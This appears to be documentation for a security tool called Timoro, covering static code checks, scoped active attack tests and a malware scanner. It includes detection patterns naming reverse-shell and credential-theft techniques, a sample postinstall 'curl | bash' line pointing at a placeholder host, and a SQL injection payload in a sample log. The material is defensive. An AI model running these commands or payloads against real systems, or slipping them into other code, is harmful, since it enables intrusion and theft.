
Pentester Mode

Static code analysis and active attack testing. Timoro acts as a real-time security guardian running continuously alongside your code.

Active mode performs real offensive tests. Use exclusively on systems you own or have explicit written authorization to test. Unauthorized use against third-party systems may constitute a crime under local law. KR Riley Soluções is not responsible for misuse.

Static Mode

Analyzes your source code without making any network requests. Safe for any environment including production CI/CD pipelines.

config (TypeScript):

```ts
pentester: {
  enabled: true,
  mode: 'static',
  static: {
    owasp:        true,  // OWASP Top 10 patterns
    secrets:      true,  // hardcoded API keys, tokens, passwords
    dependencies: true,  // CVEs via npm audit + OSV database
    injections:   true,  // SQL, XSS, path traversal in source
    headers:      true,  // insecure HTTP header patterns
  },
  severity: 'medium',
}
```
| Check | What it detects |
|---|---|
| OWASP Top 10 | Broken auth, XSS, injections, misconfiguration (A01–A10) |
| Exposed secrets | AWS keys, API keys, passwords, JWT secrets hardcoded in source |
| Vulnerable deps | CVE database check + npm audit + OSV database lookup |
| Injection patterns | SQL (string concatenation), command injection, path traversal |
| Insecure headers | Missing CSP, X-Frame-Options, HSTS, X-Content-Type-Options |

Active Mode

Real attack testing against your running application. Requires pentester.target and a signed authorization scope before any attack test runs.

🔒 Active mode validates every target against your declared scope using CIDR matching. Public internet IPs are blocked unless the scope explicitly includes them. DoS tools (hping3, slowloris, loic, hoic) and mass scans (CIDR blocks of /16 or wider) are blocked unconditionally, regardless of scope.
declare scope first (terminal):

```bash
timoro pentest --declare-scope

# interactive prompts:
# authorized by: John Doe
# targets: 192.168.1.0/24, http://staging.myapp.com
# allowed modes: static, active
# duration: 8h
# → creates .timoro/pentest-scope.json (SHA-256 integrity hash)
```
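To make the three scope rules above concrete, here is an added example of a target guard; it is not Timoro's own code. It assumes IPv4 targets only, matches http(s) URL targets by exact hostname, and treats the RFC 1918 and loopback ranges as private space.

```typescript
// Added example, not Timoro's own code: a scope guard applying the three rules above
// (CIDR match, no public IP without scope, /16-or-wider mass scans always blocked).
// Assumptions: IPv4 only; URL targets matched by exact hostname; RFC 1918 + loopback = private.
function ipv4ToInt(ip: string): number {
  const p = ip.split(".").map(Number);
  if (p.length !== 4 || p.some((o) => isNaN(o) || o % 1 !== 0 || o < 0 || o > 255)) {
    throw new Error(`invalid IPv4 address: ${ip}`);
  }
  return ((p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3]) >>> 0;
}
function maskFor(prefix: number): number {
  return prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
}
// "10.0.0.0/8" or a bare address (treated as /32) -> [network, prefix]
function parseCidr(cidr: string): [number, number] {
  const [ip, prefixStr] = cidr.split("/");
  const prefix = prefixStr === undefined ? 32 : Number(prefixStr);
  if (isNaN(prefix) || prefix % 1 !== 0 || prefix < 0 || prefix > 32) throw new Error(`invalid prefix: ${cidr}`);
  return [(ipv4ToInt(ip) & maskFor(prefix)) >>> 0, prefix];
}
// True when `target` (address or CIDR) lies entirely inside `cidr`.
function cidrContains(cidr: string, target: string): boolean {
  const [net, prefix] = parseCidr(cidr);
  const [tNet, tPrefix] = parseCidr(target);
  return tPrefix >= prefix && ((tNet & maskFor(prefix)) >>> 0) === net;
}
const PRIVATE_RANGES = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"];
// Hostname of an http(s) URL entry, or null for a bare address / CIDR.
function hostOf(entry: string): string | null {
  return entry.indexOf("://") === -1 ? null : entry.split("://")[1].split(/[/:]/)[0];
}
function checkTarget(scope: string[], target: string): { allowed: boolean; reason: string } {
  const host = hostOf(target);
  if (host !== null) {
    const ok = scope.some((e) => hostOf(e) === host);
    return { allowed: ok, reason: ok ? "host in declared scope" : "host not in declared scope" };
  }
  if (parseCidr(target)[1] <= 16) { // refused even when the declared scope would cover it
    return { allowed: false, reason: "mass scan (/16 or wider) blocked unconditionally" };
  }
  if (scope.some((e) => hostOf(e) === null && cidrContains(e, target))) {
    return { allowed: true, reason: "target within declared scope" };
  }
  const priv = PRIVATE_RANGES.some((r) => cidrContains(r, target));
  return { allowed: false, reason: priv ? "private address outside declared scope" : "public internet IP blocked without explicit scope" };
}
// Scope as in the declare-scope prompt above; 8.8.8.8 is refused as public space.
console.log(checkTarget(["192.168.1.0/24", "http://staging.myapp.com"], "192.168.1.42"), checkTarget(["192.168.1.0/24"], "8.8.8.8"));
```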
config (TypeScript):

```ts
pentester: {
  enabled: true,
  mode: 'active',
  target: 'http://localhost:3000',
  realtime: true,

  bruteforce: {
    enabled:         true,
    endpoints:       ['/auth/login', '/admin'],
    wordlist:        'built-in',
    detectRateLimit: true,
    jwtWeak:         true,
  },

  firewall: {
    enabled:       true,
    portScan:      true,
    cors:          true,
    ssl:           true,
    hsts:          true,
    xFrameOptions: true,
  },

  active: {
    sqlInjection:       true,
    xssReflected:       true,
    idor:               true,
    directoryTraversal: true,
    hiddenRoutes:       true,
  },

  severity: 'low',
}
```

Brute Force

| Test | What it does |
|---|---|
| endpoints | Tests common passwords against your auth endpoints |
| detectRateLimit | Verifies if the API blocks repeated failed attempts |
| jwtWeak | Tests JWT tokens signed with predictable/common secrets |
| sessionExpiry | Verifies session expiration and invalidation |

Network & Firewall

| Test | What it does |
|---|---|
| portScan | Detects unnecessarily exposed ports (DB ports, Redis, etc.) |
| cors | Detects overly permissive cross-origin policies |
| ssl | Verifies SSL/TLS versions and cipher suites |
| hsts | Checks for the HTTP Strict Transport Security header |
| xFrameOptions | Checks for clickjacking protection |

Active Endpoint Tests

| Test | What it does |
|---|---|
| sqlInjection | Injects real payloads into endpoints (not just code analysis) |
| xssReflected | Tests real XSS payloads against routes |
| idor | Attempts to access resources belonging to other users |
| directoryTraversal | Attempts to access files outside the permitted scope |
| hiddenRoutes | Discovers undocumented but accessible endpoints |

Severity levels

Set severity to filter which findings get logged. Only findings at or above the threshold are written to .timoro/log.md.

| Level | Examples |
|---|---|
| critical | SQL injection, hardcoded secrets, active exploit confirmed |
| high | Missing rate limiting, XSS, brute force exposure |
| medium | Open ports, CORS misconfiguration, missing CSP |
| low | Missing security headers, outdated deps with low-risk CVEs |

Malware Scanner

Separate from the pentester, timoro scan analyzes your project for malicious code patterns and compromised dependencies. Safe for CI/CD — exit code 1 on critical or high findings.

terminal:

```bash
timoro scan                 # colored output grouped by category
timoro scan --report        # generate HTML + Markdown report
timoro scan --json          # raw JSON for CI pipelines
```

| Category | Severity | Examples |
|---|---|---|
| remote-shell | critical | /dev/tcp, nc -e, bash -i >& |
| supply-chain | critical | curl \| bash in postinstall scripts |
| obfuscation | high | eval(atob()), large String.fromCharCode arrays |
| data-exfiltration | high | credential harvest + external upload |
| credential-theft | high | SSH key reads, /etc/passwd, ~/.aws/credentials |
| persistence | high | crontab writes, systemd units, shell profile modification |
| crypto-mining | high | stratum+tcp://, xmrig, cryptonight references |
| typosquatting | medium | Package names within Levenshtein distance ≤2 of popular packages |
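The following is an added example, not Timoro's own scanner, of how the category table above maps to detection rules and to the CI exit-code contract (exit 1 on critical or high). The regexes are illustrative patterns built from the table's examples column, and the scanned file contents are constructed samples, not real packages.

```typescript
// Added example, not Timoro's own scanner: rules for the categories above run
// over constructed file contents, plus the CI exit-code rule (1 on critical/high).
type Severity = "critical" | "high" | "medium" | "low";
type Rule = { category: string; severity: Severity; pattern: RegExp };
type Finding = { file: string; line: number; category: string; severity: Severity; match: string };

// Illustrative patterns only, derived from the examples column of the table.
const RULES: Rule[] = [
  { category: "remote-shell", severity: "critical", pattern: /\/dev\/tcp\/|\bnc\s+-e\b|bash\s+-i\s*>&/ },
  { category: "supply-chain", severity: "critical", pattern: /\bcurl\b[^|\n]*\|\s*(ba)?sh\b/ },
  { category: "obfuscation", severity: "high", pattern: /\beval\s*\(\s*atob\s*\(/ },
  { category: "credential-theft", severity: "high", pattern: /\/etc\/passwd|~\/\.aws\/credentials|\.ssh\/id_/ },
  { category: "persistence", severity: "high", pattern: /\bcrontab\b|\/etc\/systemd\/system\/|\.bashrc|\.zshrc/ },
  { category: "crypto-mining", severity: "high", pattern: /stratum\+tcp:\/\/|\bxmrig\b|cryptonight/i },
];

// One finding per (line, rule) hit, with the matched text kept for the report.
function scanFile(file: string, contents: string): Finding[] {
  const findings: Finding[] = [];
  contents.split("\n").forEach((text, i) => {
    for (const rule of RULES) {
      const m = rule.pattern.exec(text);
      if (m) findings.push({ file, line: i + 1, category: rule.category, severity: rule.severity, match: m[0] });
    }
  });
  return findings;
}

function scanAll(samples: Record<string, string>): Finding[] {
  const out: Finding[] = [];
  for (const file of Object.keys(samples)) out.push(...scanFile(file, samples[file]));
  return out;
}

// CI contract from the docs: non-zero exit only for critical or high findings.
function exitCodeFor(findings: Finding[]): number {
  return findings.some((f) => f.severity === "critical" || f.severity === "high") ? 1 : 0;
}

// Constructed samples (not real packages); the .invalid TLD is a placeholder.
const SAMPLES: Record<string, string> = {
  "node_modules/some-dep/package.json": '{ "scripts": { "postinstall": "curl -s https://example.invalid/i.sh | bash" } }',
  "src/vendor/helper.js": 'module.exports = () => eval(atob("Y29uc29sZS5sb2coMSk="));\nconst pool = "stratum+tcp://pool.example.invalid:3333";',
  "src/app.js": 'const express = require("express");\napp.listen(3000);',
};

const findings = scanAll(SAMPLES);
console.log(JSON.stringify(findings, null, 2), "exit code:", exitCodeFor(findings));
```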

Log output example

.timoro/log.md:

```md
## [14:23:10] 🔐 Pentester — SQL Injection

**Mode:** Active
**Endpoint:** `GET /api/users?id=1`
**Severity:** `CRITICAL`
**Payload:** `1' OR '1'='1`

**Result:** Endpoint vulnerable. Returned all table records.

**File:** `src/controllers/user.controller.ts`
**Line:** 28

**Recommendation:** Use parameterized queries or an ORM.

---

## [14:22:10] 🔐 Pentester — Brute Force

**Mode:** Active
**Endpoint:** `POST /auth/login`
**Severity:** `HIGH`

**Result:** No rate limiting. 50 attempts in 5s — not blocked.

**Recommendation:** Implement express-rate-limit.
Block IP after 5 failures within 60 seconds.
```